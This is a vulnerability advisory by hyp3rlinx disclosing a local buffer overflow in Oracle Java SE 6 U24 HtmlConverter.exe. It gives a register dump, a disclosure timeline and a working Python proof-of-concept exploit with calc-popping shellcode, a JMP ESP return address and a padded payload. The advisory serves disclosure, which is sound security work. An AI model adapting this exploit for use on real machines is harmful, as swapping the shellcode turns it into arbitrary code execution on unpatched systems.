Java Platform SE 6 U24 HtmlConverter.exe Buffer Overflow

`[+] Credits: hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt  
  
  
  
Vendor:  
===============  
www.oracle.com  
  
  
  
Product:  
========================================  
Java Platform SE 6 U24 HtmlConverter.exe  
Product Version: 6.0.240.50  
  
  
The HTML Converter is part of Java SE binary part of the JDK and Allows web  
page authors to explicitly target  
the browsers and platforms used in their environment when modifying their  
pages.  
  
  
  
Vulnerability Type:  
============================  
Buffer Overflow  
  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
  
Vulnerability Details:  
=====================  
  
When calling htmlConverter.exe with specially crafted payload it will cause  
buffer overflow executing arbitrary attacker supplied code.  
This was a small vulnerability included as part of the overall Oracle CPU  
released on January 19, 2016.  
  
Reference:  
http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html  
  
  
  
registers ...  
  
EAX FFFFFFFE  
ECX FFFFFFFE  
EDX 0008E3C8  
EBX 7EFDE000  
ESP 0018FEB4  
EBP 0018FF88  
ESI 00001DB1  
EDI 00000000  
EIP 52525252 <-------- "RRRR" \x52  
C 0 ES 002B 32bit 0(FFFFFFFF)  
P 0 CS 0023 32bit 0(FFFFFFFF)  
A 1 SS 002B 32bit 0(FFFFFFFF)  
Z 0 DS 002B 32bit 0(FFFFFFFF)  
S 0 FS 0053 32bit 7EFDD000(FFF)  
T 0 GS 002B 32bit 0(FFFFFFFF)  
D 0  
  
  
  
Exploit code(s):  
===============  
  
###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "  
#EIP @ 2493  
pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "  
#EIP 2469 - 2479  
  
#shellcode to pop calc.exe Windows 7 SP1  
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"  
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"  
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"  
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"  
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"  
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"  
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")  
  
  
#JMP ESP kernel32.dll  
rp=struct.pack('<L', 0x76E72E2B)  
  
  
payload="A"*2469+rp+"\x90"*10+sc  
subprocess.Popen([pgm, payload], shell=False)  
  
  
Disclosure Timeline:  
=====================================  
Vendor Notification: August 28, 2015  
January 20, 2016 : Public Disclosure  
  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
  
Severity Level:  
===============  
Medium  
  
  
  
Description:  
=============================================================  
  
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe  
  
=============================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author.  
The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
  
by hyp3rlinx  
`